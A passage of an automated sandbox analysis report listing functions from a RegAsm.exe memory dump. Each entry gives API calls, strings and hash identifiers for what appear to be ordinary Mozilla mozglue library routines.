                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: b857804f592755bc155852f9b508ffbebedc920e1d17f24650cb3c4ae46d4def
                                                                                    • Instruction ID: a95bac96e151be3274201b163910ff92d3a4bf9a5dfb3df8f3dd4d3f0b049cb8
                                                                                    • Opcode Fuzzy Hash: b857804f592755bc155852f9b508ffbebedc920e1d17f24650cb3c4ae46d4def
                                                                                    • Instruction Fuzzy Hash: 79112130A14B00C7D3128F29C4007A5B3B0FFDA328F11932BE85953B01EBB0B5C18788
                                                                                    Function 6C703DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C6CF20E,?), ref: 6C703DF5
                                                                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C6CF20E,00000000,?), ref: 6C703DFC
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C703E06
                                                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C703E0E
                                                                                      • Part of subcall function 6C6FCC00: GetCurrentProcess.KERNEL32(?,?,6C6C31A7), ref: 6C6FCC0D
                                                                                      • Part of subcall function 6C6FCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6C31A7), ref: 6C6FCC16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                    • String ID:
                                                                                    • API String ID: 2787204188-0
                                                                                    • Opcode ID: 16a7d78c2fad6bbafbac29987910dbdbe4f9c458cdecd3b0f36bddc291481742
                                                                                    • Instruction ID: 2c949a29ab500e64de22949404c45d985e6d7d4089d8cd6be2e77894a2e16154
                                                                                    • Opcode Fuzzy Hash: 16a7d78c2fad6bbafbac29987910dbdbe4f9c458cdecd3b0f36bddc291481742
                                                                                    • Instruction Fuzzy Hash: DAF08CB1A002087BEB00AB54EC85DAB376DEB46629F044031FE0C57701D735BE2986FB
                                                                                    Function 6C712050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71205B
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C71201B,?,?,?,?,?,?,?,6C711F8F,?,?), ref: 6C712064
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71208E
                                                                                    • free.MOZGLUE(?,?,?,00000000,?,6C71201B,?,?,?,?,?,?,?,6C711F8F,?,?), ref: 6C7120A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: e490187a111792a881057dbf382efb730dc04bc49e188a0eed01b71254c66cad
                                                                                    • Instruction ID: b467efa56b054c2a3e6237b8be93c161183ff0f7b19c624c41cb7986e3078006
                                                                                    • Opcode Fuzzy Hash: e490187a111792a881057dbf382efb730dc04bc49e188a0eed01b71254c66cad
                                                                                    • Instruction Fuzzy Hash: 01F0B471104A109FC7119F16D888B5BB7F8EF8B368F14012AE50687B10DB71B806CB95
                                                                                    Function 6C7120B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7120B7
                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C6FFBD1), ref: 6C7120C0
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C6FFBD1), ref: 6C7120DA
                                                                                    • free.MOZGLUE(00000000,?,6C6FFBD1), ref: 6C7120F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 2047719359-0
                                                                                    • Opcode ID: cb26be335fe928832b9619893bb848bf00c6fac36a9a131397315fa1166be13f
                                                                                    • Instruction ID: 3c591dc8ee583bdbcf4b7a011f90db115b5d7b6d94853d26f6fc21b3639e8202
                                                                                    • Opcode Fuzzy Hash: cb26be335fe928832b9619893bb848bf00c6fac36a9a131397315fa1166be13f
                                                                                    • Instruction Fuzzy Hash: AEE06531605A249BC720AF25980894EB7FDEF87318B14463BE54693F00E776B9468AD9
                                                                                    Function 6C7185B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C7185D3
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C718725
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                    • String ID: map/set<T> too long
                                                                                    • API String ID: 3720097785-1285458680
                                                                                    • Opcode ID: a1e76f64790d06eb4e73e8f90e00f25cb67dab65272240c1ef65ff2c57f66409
                                                                                    • Instruction ID: 6098090ef59be923c4a729ae86976de820256c284c1453cd8cba70ea4699824c
                                                                                    • Opcode Fuzzy Hash: a1e76f64790d06eb4e73e8f90e00f25cb67dab65272240c1ef65ff2c57f66409
                                                                                    • Instruction Fuzzy Hash: 3F517874A08651CFD701CF28C288B55BBF1BF4A318F1AC29AD8595BB52C335E845CF92
                                                                                    Function 6C6CBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C6CBDEB
                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CBE8F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                    • String ID: 0
                                                                                    • API String ID: 2811501404-4108050209
                                                                                    • Opcode ID: 32b1761a71f7a69684ec118a11e01defcfddba6b104869c31f16554a6003c5bf
                                                                                    • Instruction ID: 023302ac7d104dc502bb366abe5ffd27f0d1ad2bb040a004020bae07ff1e30f2
                                                                                    • Opcode Fuzzy Hash: 32b1761a71f7a69684ec118a11e01defcfddba6b104869c31f16554a6003c5bf
                                                                                    • Instruction Fuzzy Hash: 58418E71A09745CFC701DF38D481A9BB7E4EFCA388F008A1DF995A7611D731A9498B8B
                                                                                    Function 6C703CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C703D19
                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C703D6C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errnomozalloc_abort
                                                                                    • String ID: d
                                                                                    • API String ID: 3471241338-2564639436
                                                                                    • Opcode ID: 039179f4f23ce5e29406bb516539b2163b36865e3b001dc70ad58f5e0d764a52
                                                                                    • Instruction ID: d5c45ff04c31f8df7d8e37cb4f545e456f19420938fa78b6b238a4ab3c47ece0
                                                                                    • Opcode Fuzzy Hash: 039179f4f23ce5e29406bb516539b2163b36865e3b001dc70ad58f5e0d764a52
                                                                                    • Instruction Fuzzy Hash: 34112371F04688DBDB00DF69C9198EDB7B5EF96318B44C329DC489B602FB30A584C394
                                                                                    Function 6C6D4730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6D44B2,6C74E21C,6C74F7F8), ref: 6C6D473E
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C6D474A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetNtLoaderAPI
                                                                                    • API String ID: 1646373207-1628273567
                                                                                    • Opcode ID: b3e92b6a24f5eb83676e1174cf59d748e7df7ff20c7b978bd8aec8a1ed580304
                                                                                    • Instruction ID: fbb1ece7913ee3666bd83e0238333dfc9fa7fdd1f495da29cb226faa36812ba1
                                                                                    • Opcode Fuzzy Hash: b3e92b6a24f5eb83676e1174cf59d748e7df7ff20c7b978bd8aec8a1ed580304
                                                                                    • Instruction Fuzzy Hash: 79014C757016149FDF00AF6A8894A2A7BB9FB8A329B45807AE905CB700DB75EC018F95
                                                                                    Function 6C726DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C726E22
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C726E3F
                                                                                    Strings
                                                                                    • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C726E1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footergetenv
                                                                                    • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                    • API String ID: 1472356752-1153589363
                                                                                    • Opcode ID: 8326dd61cc7ef2fb20feaa235c37593d2b83fa5ffae4189d9576f8f3d7b176c6
                                                                                    • Instruction ID: ea91113ca8da95769c98481915bf8f1fbc9317888e474ad67c612bd20524f61e
                                                                                    • Opcode Fuzzy Hash: 8326dd61cc7ef2fb20feaa235c37593d2b83fa5ffae4189d9576f8f3d7b176c6
                                                                                    • Instruction Fuzzy Hash: 20F05235A04280CBEB00BBA8CA50A927376F31331DF0481B7C81086BA2D734A717CAA7
                                                                                    Function 6C6D9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D9EEF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID: Infinity$NaN
                                                                                    • API String ID: 1385522511-4285296124
                                                                                    • Opcode ID: 8d7ad0154ce62aaa87b1bae3f47d90c25a741a06705031bab68096743d650bc1
                                                                                    • Instruction ID: c26485aa8ce2b68e55c5206928d305715658aa97fb2dfb3d927ebb85a112efe0
                                                                                    • Opcode Fuzzy Hash: 8d7ad0154ce62aaa87b1bae3f47d90c25a741a06705031bab68096743d650bc1
                                                                                    • Instruction Fuzzy Hash: 99F0AF71600642CBDB00AF68DA777813372A70331DF208A76C5040AB41D7356546CE8A
                                                                                    Function 6C6D6C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(0Kpl,?,6C704B30,80000000,?,6C704AB7,?,6C6C43CF,?,6C6C42D2), ref: 6C6D6C42
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • moz_xmalloc.MOZGLUE(0Kpl,?,6C704B30,80000000,?,6C704AB7,?,6C6C43CF,?,6C6C42D2), ref: 6C6D6C58
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: moz_xmalloc$malloc
                                                                                    • String ID: 0Kpl
                                                                                    • API String ID: 1967447596-3332051225
                                                                                    • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                    • Instruction ID: b77a80a845eb8788f8e772da7ef8ce33dbe5f1ada59d61315824bbd49949a282
                                                                                    • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                    • Instruction Fuzzy Hash: 51E086F1A105055A9B0899BCAC0956A72C88B193A87094E75E823C6BD8FA94F554819D
                                                                                    Function 6C725900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C7451C8), ref: 6C72591A
                                                                                    • CloseHandle.KERNEL32(FFFFFFFF), ref: 6C72592B
                                                                                    Strings
                                                                                    • MOZ_SKELETON_UI_RESTARTING, xrefs: 6C725915
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseEnvironmentHandleVariable
                                                                                    • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                                    • API String ID: 297244470-335682676
                                                                                    • Opcode ID: 464fe6d7b51223459f80b7f2ec63da3b70b580964ff3f90f61e2e3e9218365e0
                                                                                    • Instruction ID: 05d82afa0fdc75155cabe92ccb834040594f074c64803349de3c218857c75bd5
                                                                                    • Opcode Fuzzy Hash: 464fe6d7b51223459f80b7f2ec63da3b70b580964ff3f90f61e2e3e9218365e0
                                                                                    • Instruction Fuzzy Hash: D1E0D830204650FBDB009B68D7087457FF89B1337DF10C525E5A883AC1C3B56C408791
                                                                                    Function 6C6D3850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F860), ref: 6C6D385C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F860,?), ref: 6C6D3871
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                                    • String ID: ,tl
                                                                                    • API String ID: 17069307-3974665966
                                                                                    • Opcode ID: 7c0bd5c237c5e160fdbf4eedc430074d87a41f3cc22262d8df8a6bb5bee26e62
                                                                                    • Instruction ID: 50be6e5eac31490128f3a8acb8fc2901c4e4e9a2c2412e5dfb49193d94b4346c
                                                                                    • Opcode Fuzzy Hash: 7c0bd5c237c5e160fdbf4eedc430074d87a41f3cc22262d8df8a6bb5bee26e62
                                                                                    • Instruction Fuzzy Hash: 50E04F31A05E2C97C712AFA7950698ABB7CEE477A8305C166E40A1BE00C730B58086D9
                                                                                    Function 6C6DBED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C6DBEE3
                                                                                    • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C6DBEF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$CallsDisableLoadThread
                                                                                    • String ID: cryptbase.dll
                                                                                    • API String ID: 4137859361-1262567842
                                                                                    • Opcode ID: 39ed643c943d059396ebe6d7019fdebca4e08462e8ce7eb1a7cf88a0388b82b0
                                                                                    • Instruction ID: 504b4d7b642d3c2c6cfb804931d864ee480a2451f14235349901417c75e014a1
                                                                                    • Opcode Fuzzy Hash: 39ed643c943d059396ebe6d7019fdebca4e08462e8ce7eb1a7cf88a0388b82b0
                                                                                    • Instruction Fuzzy Hash: 4CD0A932284608EACA00BAA08D0AF2D3BBCA782369F10C036F30584851C7B0B812DB88
                                                                                    Function 6C6C50E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6C4E9C,?,?,?,?,?), ref: 6C6C510A
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6C4E9C,?,?,?,?,?), ref: 6C6C5167
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C6C5196
                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6C4E9C), ref: 6C6C5234
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3510742995-0
                                                                                    • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                    • Instruction ID: 9cc89da931fea5a07a47ccc95824ee2e17503a3ef6fffd7be78c97e84dac5b61
                                                                                    • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                    • Instruction Fuzzy Hash: C691AD35605616CFCB14CF08C894A96BBA1FF9A318B288688DC589FB15D331FC42CBE1
                                                                                    Function 6C7008F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC), ref: 6C700918
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E7DC), ref: 6C7009A6
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC,?,00000000), ref: 6C7009F3
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E7DC), ref: 6C700ACB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3168844106-0
                                                                                    • Opcode ID: e32d3f264276b14c6a8e714e6c4ce615e44a085b04a7d7aaa2594296f9af6e7f
                                                                                    • Instruction ID: f35c404c2af9cac024c16087ce92249ccdf948f182f1278cd8f5c7b5dc2155c2
